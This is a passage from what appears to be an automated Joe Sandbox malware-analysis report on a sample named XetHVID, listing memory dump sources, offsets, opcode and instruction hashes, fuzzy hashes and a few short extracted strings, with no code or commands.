                                                                  • Opcode Fuzzy Hash: 8c2b47366963f6449f76980355005068594371fc5ffff6f1fe84afc849a43805
                                                                  • Instruction Fuzzy Hash: 84E09271A10204EFCB00EFB4EA0155D7BB0EB90305B1048ABD809E3685EA36AE01DB24
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d0910995a31e97ac75e5aa485fa839dfe1d56a545676b7749da3f719b60ff07
                                                                  • Instruction ID: d6289a9f59e25194fcb353c4b7316a4531f43953fd1f4ec2ea869b0522839e6a
                                                                  • Opcode Fuzzy Hash: 6d0910995a31e97ac75e5aa485fa839dfe1d56a545676b7749da3f719b60ff07
                                                                  • Instruction Fuzzy Hash: 25D012D363C104C7F548B568540D736655E9782311F0340AE500F66E8EDD12BC1043A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b081446461429ccb94575bdc78116977c2b7d902d7fc4f748d3a576077984a10
                                                                  • Instruction ID: daef59e8d65619a086c1bfe5389688d1f2d80526c68e933629646bc51eee7e41
                                                                  • Opcode Fuzzy Hash: b081446461429ccb94575bdc78116977c2b7d902d7fc4f748d3a576077984a10
                                                                  • Instruction Fuzzy Hash: C0D017E0A3C10CDB6250EA99644313AF6ACA78B222F0048CEA84FD7F04D9222D0043B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 515b883d83a7a6a9a8dcc7dffe1515c7832b036d418f3ea6441f5f7e0d79c175
                                                                  • Instruction ID: 8f2211a8670ec0da69d9f4af8cdbdd575b9bd36cac635ed669e961e92e327523
                                                                  • Opcode Fuzzy Hash: 515b883d83a7a6a9a8dcc7dffe1515c7832b036d418f3ea6441f5f7e0d79c175
                                                                  • Instruction Fuzzy Hash: A1E08670601209EFCB04EFB8E505A9DB7F5EB40315F5045AAA40897351DBB02F00DB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 922fd2f53054af8d6f0ed22079c0b956234a8e4f9532f0134a941950c97712e7
                                                                  • Instruction ID: 017b47469552046e75c065116fdf6516bf46c021c6b2d99206daf0bc4f314a2d
                                                                  • Opcode Fuzzy Hash: 922fd2f53054af8d6f0ed22079c0b956234a8e4f9532f0134a941950c97712e7
                                                                  • Instruction Fuzzy Hash: 47E04F71A00218FFCB00EFA8EA4155CBBB9EB84205B108599E80893704EA326E009B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 552a90a1e58dfabc3a13c30366f1fa86b3fa2cbbb12deca8b80ea4664c487a11
                                                                  • Instruction ID: 5e3b7dd47efaa2aada5d2006bb58190566e20cd0ccc6d821a889627c52ac52b7
                                                                  • Opcode Fuzzy Hash: 552a90a1e58dfabc3a13c30366f1fa86b3fa2cbbb12deca8b80ea4664c487a11
                                                                  • Instruction Fuzzy Hash: 84E01AF1D197858FD705DF78C8A6269FFB1FE42204B18809FD0689B217C730691ACB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3f2f9275ce7d16a02ec48914e4a9db890e13fa6dc64c02ed34a2ad1a76ebc08
                                                                  • Instruction ID: ee00f73573fb2109c86fdc68ce545255c3e78c286bd3eaf210884a9ae7645b17
                                                                  • Opcode Fuzzy Hash: d3f2f9275ce7d16a02ec48914e4a9db890e13fa6dc64c02ed34a2ad1a76ebc08
                                                                  • Instruction Fuzzy Hash: 4FE01771850A0CDECB44EF78D90859E7BE8AB05224F00C53AE84D9A110FA31D6E8DF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 781fc262a0d61dd055614d61177d6c900d3ca85a81d292b12ec22f711a3dfea7
                                                                  • Instruction ID: e5cdb6519a80e3764ce11f127c11fa86c728513832f5b77cfc6487baced3d1a0
                                                                  • Opcode Fuzzy Hash: 781fc262a0d61dd055614d61177d6c900d3ca85a81d292b12ec22f711a3dfea7
                                                                  • Instruction Fuzzy Hash: 55D0A7307002044BA3047FB6B85B3BA37DEEF80555B418015B50DC35C1DF24D851C721
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efb0325059e3e7326e8eab9ba429012993525e4fee136b75c1340298fc998832
                                                                  • Instruction ID: 939ebc1806528a33f4abb56089c7b780d2a960dd47ffbe05219a12adebacbb64
                                                                  • Opcode Fuzzy Hash: efb0325059e3e7326e8eab9ba429012993525e4fee136b75c1340298fc998832
                                                                  • Instruction Fuzzy Hash: 92D0A73730E3808FC7514774692D2D53F65DB96212B0404FBE548C6656D63C8845C361
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a976762714ef4939b91ec77b56db51a6aaed5d4b7f33b24f8e89805e14f87d7
                                                                  • Instruction ID: 66aa1c4bcb3970c69fcb70c953e99c2393184caf7de33cecdd70bbe0bd263066
                                                                  • Opcode Fuzzy Hash: 1a976762714ef4939b91ec77b56db51a6aaed5d4b7f33b24f8e89805e14f87d7
                                                                  • Instruction Fuzzy Hash: F4C012F123CA38CAB100D1A814245393A9D668A206F20740F950F82E42CE12CC040773
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2537905e525f338685ce7a63ca92de20633d806721fd2222263f9ae971ec76e
                                                                  • Instruction ID: 6e6eead55a7eb9ae4a1f8f996fb48b49a434749d786ec33db6539b24e035f1a8
                                                                  • Opcode Fuzzy Hash: a2537905e525f338685ce7a63ca92de20633d806721fd2222263f9ae971ec76e
                                                                  • Instruction Fuzzy Hash: C2C08C32211324DBC71427B8A8096DA3BDDEB8A226B000076F10DC2710CBBA880187E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bfba884c23f764a5ce47c2b5f66373011b0ed97782e3a7764d7f859fcb7d60e
                                                                  • Instruction ID: 9f0cce1dc6fcb0ca50c952d1ccf832796b3726d36466e77a98f34962eff1d92f
                                                                  • Opcode Fuzzy Hash: 9bfba884c23f764a5ce47c2b5f66373011b0ed97782e3a7764d7f859fcb7d60e
                                                                  • Instruction Fuzzy Hash: F7C08072115360CBE714AF68A4803517FE1DF47130F45CD6D508493E01D13588098780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 77d7338a71020fa9a91bb30022c9db5e776e6464cb8090be39ff0c6d2b7a748c
                                                                  • Instruction ID: 16ed97495b51d07a31e23cc53f1d36a02ea4220431071708abc09a444d239963
                                                                  • Opcode Fuzzy Hash: 77d7338a71020fa9a91bb30022c9db5e776e6464cb8090be39ff0c6d2b7a748c
                                                                  • Instruction Fuzzy Hash: 83E01775A40209CFC700CFA8E09AAADBFB0EF0C310F208059E412E73A1CB705844CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff1ae8668f9d39340d7ca28ca03dbbb6d3a2026ddd83c492bb8d402170b7f6a9
                                                                  • Instruction ID: 00b7b6236f3ed9899ee3b0f672fc851fb366ab51aa0a55762f1e5f1be8f83188
                                                                  • Opcode Fuzzy Hash: ff1ae8668f9d39340d7ca28ca03dbbb6d3a2026ddd83c492bb8d402170b7f6a9
                                                                  • Instruction Fuzzy Hash: ECC012A102C3C98BD30202A4B41B0BABF3C0803224B060097E5498D853850968A087A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c32f268f4176f6706cf87cb8f1e0afb7e29e52a854f0384631abdb63b139bcd7
                                                                  • Instruction ID: 94bacdac904513f53395507b5a47d64eb568a12b096effd35528d7563d5ddc1b
                                                                  • Opcode Fuzzy Hash: c32f268f4176f6706cf87cb8f1e0afb7e29e52a854f0384631abdb63b139bcd7
                                                                  • Instruction Fuzzy Hash: E2D0A92482D7D40EC7037738680404ABF70EE5310074642A7C084AA0A3EA240668C3A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c065956341689cc2fc601a9d5bb093f35713ee74aba10dc6d88cdc41eeed4f3
                                                                  • Instruction ID: a6a55cbfd11d03ada2e6c4c701770f5153598c027eb963769b951272c352604a
                                                                  • Opcode Fuzzy Hash: 9c065956341689cc2fc601a9d5bb093f35713ee74aba10dc6d88cdc41eeed4f3
                                                                  • Instruction Fuzzy Hash: 15D0C935502226DBEF50A656EA4A76E7BA3E3C032EF088660904A82E49CA7C54CAC740
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef2c612f88dd5746e5f7c795935e5facfc797c3ba313adb224b06449d2ee1cac
                                                                  • Instruction ID: 5a4f4d3c2af1f14e18ecbe2b35fd4c8fe0b95022e7024cd11bd9397817c0a6f1
                                                                  • Opcode Fuzzy Hash: ef2c612f88dd5746e5f7c795935e5facfc797c3ba313adb224b06449d2ee1cac
                                                                  • Instruction Fuzzy Hash: 4ED09E751052849FC7428B61C5459457F71EF1621071A80DBE448CB673D231D929CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c5cf78a7fcde221a1b3d40af95cdbfa43ed0ae1506d441e286c8dd01963e91a
                                                                  • Instruction ID: 279b20b4d15241c658b661d1e78370f949c71b32a041aee16aa33d68bedcb248
                                                                  • Opcode Fuzzy Hash: 4c5cf78a7fcde221a1b3d40af95cdbfa43ed0ae1506d441e286c8dd01963e91a
                                                                  • Instruction Fuzzy Hash: 3BC08CB00412288BE6146BA8B80E364BA6C6700302F882010E70E15421DF680800C661
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c081ac479888581ba445ea8c91d46a6b586562156c279c663f920327f15878b
                                                                  • Instruction ID: e780ccf2d7e9b895371a159a5e5e6cc31a7f6d711b2afd0d26623d12bd7e6d11
                                                                  • Opcode Fuzzy Hash: 4c081ac479888581ba445ea8c91d46a6b586562156c279c663f920327f15878b
                                                                  • Instruction Fuzzy Hash: 31D012F2418160DFC300CB51DDD6C987FF0BF0E34070549CAC0054B222D330A411CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3238a43dd4ac5ea648fc60b3499a1889afa6cd0f90b56f3b683e495b973deba
                                                                  • Instruction ID: bed1a6025494bf33a26274ed8e89d9172263d84bd02d610ef6a263259d8e8b79
                                                                  • Opcode Fuzzy Hash: c3238a43dd4ac5ea648fc60b3499a1889afa6cd0f90b56f3b683e495b973deba
                                                                  • Instruction Fuzzy Hash: ABD09270A092828AD3598B2CA004301BE907B55304F1881EEA1488A347D7B6E5C4CBA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 661b0d7b8ae5d7f4c7d0bd318381ce2903be3471d98c491cc45e60ffd7d32b56
                                                                  • Instruction ID: cbee609694c08a99acac6753252e8e531768caa7171fa4f45138d3eec43517f5
                                                                  • Opcode Fuzzy Hash: 661b0d7b8ae5d7f4c7d0bd318381ce2903be3471d98c491cc45e60ffd7d32b56
                                                                  • Instruction Fuzzy Hash: 40B092E29208408AF702F0A0C9A3B6A2600ABB1200B3288158A08E0244EA1AE5A341A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b32a0327da5c28835fa8f0b45a4fafba1f36e6d2ccf2575bf5daa0575ce104a1
                                                                  • Instruction ID: cbac646c7c175f68abc58268c33518b41223e35ba9aace1b7e1f155d7ce0991c
                                                                  • Opcode Fuzzy Hash: b32a0327da5c28835fa8f0b45a4fafba1f36e6d2ccf2575bf5daa0575ce104a1
                                                                  • Instruction Fuzzy Hash: AEB092F503C22CC22D00E1D82C292353A1C6007A11F40205EA18F20D0109011C510372
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                  • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                  • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                  • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43bbb33ac88ddc989f72bb816129f493ec02b024480f6f70939046159c23b4de
                                                                  • Instruction ID: c37da43482be65c5f0d690352f33c578e9bbd994129ff4b5bde1e3e9bde8da13
                                                                  • Opcode Fuzzy Hash: 43bbb33ac88ddc989f72bb816129f493ec02b024480f6f70939046159c23b4de
                                                                  • Instruction Fuzzy Hash: 6EB092AB2201000BDB545640C8CA3D42BA1EB02326FD908A980808AE40EA6E410E8B8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c66c5a4193562eecf74c9227d72fca01179231032755ec0cada69165d6a24a9
                                                                  • Instruction ID: 6f84e7b1fff243a319d678225c0d51e706917f295629b38fe3bcb6989feb65cc
                                                                  • Opcode Fuzzy Hash: 3c66c5a4193562eecf74c9227d72fca01179231032755ec0cada69165d6a24a9
                                                                  • Instruction Fuzzy Hash: 75B092E51A8609A3A000A2A45889A3A5890EBB2701B408D0A2A8D20020892248A8971B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6aa1efa31872790da679d12e62022170f8802ad7f02a13c3ed190cf460845d8f
                                                                  • Instruction ID: e9bdc1abc319992ce6ec0d0f5dbf46f17c053fdde2ffd9a6f5e871f43a276c78
                                                                  • Opcode Fuzzy Hash: 6aa1efa31872790da679d12e62022170f8802ad7f02a13c3ed190cf460845d8f
                                                                  • Instruction Fuzzy Hash: A9C04CF0B60219EFFB11CA51DE87DACF66E6B46B00F104514E74676594DB6049018740
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d742a260cd230f4bb51a277b9e07a4a4cbae0b154fad74441064de99716e1432
                                                                  • Instruction ID: 092f9bff9a80928c5aebdf373f20ca213efee448e070cc9fbb826287203ab0cd
                                                                  • Opcode Fuzzy Hash: d742a260cd230f4bb51a277b9e07a4a4cbae0b154fad74441064de99716e1432
                                                                  • Instruction Fuzzy Hash: 4FB012E033020047C348AB94889D33629D2FF82304FD04CAA80C449000CF65000ACB47
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bc67b5d44a0604ede5bb5a073a74bf6fadf4b630ff7deb0679bc9bdefd30e7f
                                                                  • Instruction ID: 5676da3887795e28d2234e09940d2bb037ce940c29bd44057c9513826b89e0c7
                                                                  • Opcode Fuzzy Hash: 9bc67b5d44a0604ede5bb5a073a74bf6fadf4b630ff7deb0679bc9bdefd30e7f
                                                                  • Instruction Fuzzy Hash: 63A011E003820CCAA200A280B00B03AFB3C2082308F000008EA0E088022A2A3C300288
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'dq$4'dq$4'dq$4|iq$4|iq$$dq
                                                                  • API String ID: 0-2773531318
                                                                  • Opcode ID: ebfbdf0eb9dfa8e185eed2ab5e2a238b7794c6368e01024441cea4f9e7c0d37a
                                                                  • Instruction ID: 9763bf829868134c7347577c7cfc1ac86efe6967a4ef0344d03ef1d6c3ccf021
                                                                  • Opcode Fuzzy Hash: ebfbdf0eb9dfa8e185eed2ab5e2a238b7794c6368e01024441cea4f9e7c0d37a
                                                                  • Instruction Fuzzy Hash: CAF1B071700251CFEB599F69C494A2E7BB2BF8570271A44BEE606CB362CB31DD4287A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq
                                                                  • API String ID: 0-2861643491
                                                                  • Opcode ID: 296882c9c4be6424a69eb3027cafbb3e17b0176f3a3a76a0b64fd470e80336ce
                                                                  • Instruction ID: ac991d7a6227a345bc3d31dd53d4da326f3d4bd23fe6a698028313cf10c9eef3
                                                                  • Opcode Fuzzy Hash: 296882c9c4be6424a69eb3027cafbb3e17b0176f3a3a76a0b64fd470e80336ce
                                                                  • Instruction Fuzzy Hash: 16F172747002149FDB19AB75ED58B6E7BE2FF88301F104529E50AAB3E5DF719C068B80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 3c6c9ae87d3b2b4aefa1d234d3fba6f7faf1203c4098542049bc9029497962d9
                                                                  • Instruction ID: 4fe533ac3172754a1b24cfff4a16b1e966ddef89947e9c23b2fbfe694a2a0a2f
                                                                  • Opcode Fuzzy Hash: 3c6c9ae87d3b2b4aefa1d234d3fba6f7faf1203c4098542049bc9029497962d9
                                                                  • Instruction Fuzzy Hash: F2D14E747042148FCB19AB75EC94BAE7BE2EF88301F144569E40AAB3E5DF359C06CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 1b2801241abc66ef2fdff9d707a043f1abab0e4efbface47cfd7993f5bb5cbef
                                                                  • Instruction ID: adcf8e4cadd4ca296d1689f161be0646006f5005e5402e1d24b15a3f9a02d0b5
                                                                  • Opcode Fuzzy Hash: 1b2801241abc66ef2fdff9d707a043f1abab0e4efbface47cfd7993f5bb5cbef
                                                                  • Instruction Fuzzy Hash: 7C9192707002148FDB19AB79D9947AF7AE3BF88700F14852DE50AAB3E4DF719D068B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRdq
                                                                  • API String ID: 0-3106745678
                                                                  • Opcode ID: 09418f679f2d782516bfd6002934d25c168f84b4ac1ea8b5924cf07db1a8f553
                                                                  • Instruction ID: 269309c80a25678f0762a1cfb46e96b476f75146e5fae2c5db6453bf3b112f68
                                                                  • Opcode Fuzzy Hash: 09418f679f2d782516bfd6002934d25c168f84b4ac1ea8b5924cf07db1a8f553
                                                                  • Instruction Fuzzy Hash: 2121F630B112159FCB49EB78889577F7BF6AFC9304B1484AAE449EB395DE30DD028792
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRdq
                                                                  • API String ID: 0-3106745678
                                                                  • Opcode ID: 9cf59cf4a825a7bb69d67d6f97c40da2fa19c144b0226a0dd96e9ea3246ee5e8
                                                                  • Instruction ID: 87960a99ee36b871fff97110ce42ca6692509d7bceba7568a49911810019a9e9
                                                                  • Opcode Fuzzy Hash: 9cf59cf4a825a7bb69d67d6f97c40da2fa19c144b0226a0dd96e9ea3246ee5e8
                                                                  • Instruction Fuzzy Hash: A721F330B002155FCB45EB78989077F7BF6AFC4304B1484AEE449EB39ADE709D028B92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq
                                                                  • API String ID: 0-4210879014
                                                                  • Opcode ID: ed88938f96a450906b63410c97482b813db1715bd1c6ed6dffac22b194828543
                                                                  • Instruction ID: 2ce59979218fb23460f2a00fff64a93b4e27bdb55ea07bef28eb6e8c74af9974
                                                                  • Opcode Fuzzy Hash: ed88938f96a450906b63410c97482b813db1715bd1c6ed6dffac22b194828543
                                                                  • Instruction Fuzzy Hash: 4821C230E041048FCB44EFB894A67AE7FB1AF85300F1485BDD009E7681DB755A02CB81
                                                                  Memory Dump Source
